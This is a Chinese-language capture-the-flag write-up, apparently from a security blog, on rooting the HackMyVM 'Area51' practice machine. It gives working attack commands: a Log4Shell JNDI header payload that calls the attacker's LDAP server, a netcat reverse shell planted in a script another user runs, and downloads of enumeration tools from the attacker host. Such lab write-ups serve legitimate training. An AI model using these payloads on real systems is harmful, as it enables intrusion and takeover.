记一次对Hackmyvm-Area51靶机的渗透测试

白帽子社区

共 2130字,需浏览 5分钟

 ·

2022-02-10 21:55

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51

名称:Area51(51区)

难度:中等

创作者:bit

发布日期:2021-12-24

目标:user.txt和root.txt

搭建靶机

下载完Area51.ova后,使用Oracle VM VirtualBox导入即可

导入时注意!!不要勾上USB控制器,不然会出错

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMwareKali192.168.2.148
目标机:VirtualBoxDebianIP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.2.0/24

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.2.108

扫描到22(SSH)、80(HTTP)、8080(HTTP)三个端口,使用火狐浏览器访问80端口,192.168.2.108

好家伙佛波乐(FBI)页面,访问下8080端口,192.168.2.108:8080

发现是一个400报错页面

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt


扫描到一个note.txt,访问下192.168.2.108/note.txt

翻译看看

渗透测试

提示存在Log4j漏洞,猜测到很有可能跟8080端口有关,直接访问,使用Burp的插件log4j扫描看看

发现X-Api-Version:参数存在漏洞

存在log4j漏洞,使用poc(https://github.com/kozmer/log4j-shell-poc)拿shell

在kali机器中,log4j-shell-poc目录下必须有jdk1.8.0_20文件夹的java

(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)

git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
python3 poc.py --userip 192.168.2.148

新开一个终端页面开启监听

nc -nvlp 9001

再新开一个终端页面,输入刚刚的payload

curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'

监听这边的终端就收到了

发现是在docker里面,上传一个linpeas.sh搜集下信息

kali机器下载好linpeas.sh,新开一个终端页面开启远程下载服务

python3 -m http.server 7788

监听这边的终端页面执行下载linpeas.sh

wget http://192.168.2.148:7788/linpeas.sh

执行linpeas.sh信息收集

chmod +x linpeas.sh
./linpeas.sh

发现一些目录查看下

cat /var/tmp/.roger,查询到roger的密码
使用ssh远程登录
ssh roger@192.168.2.108

拿到user.txt下的一个FLAG=[xxxxxx]

继续使用linpeas.sh搜集信息

wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

发现了roger下有个kang

cat /etc/pam.d/kang,发现是kang的密码
su kang

发现kang的主目录发生了一些奇怪的事情,一个文件不断出现并消失

看起来像是kang用户创建了一个shell脚本,执行所有的.sh文件并删除它们

echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

新开一个终端页面开启监听

nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt

成功获取到root权限下的FLAG=[xxxxx]


往期精彩文章




linux 查看用户登录信息
从工具OneForAll代码角度学习子域名挖掘
小程序测试流程
迷糊的提权方式以及利用ssrf到最终提权靶机


技术支持:白帽子社区团队
— 扫码关注我们 



浏览 37
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报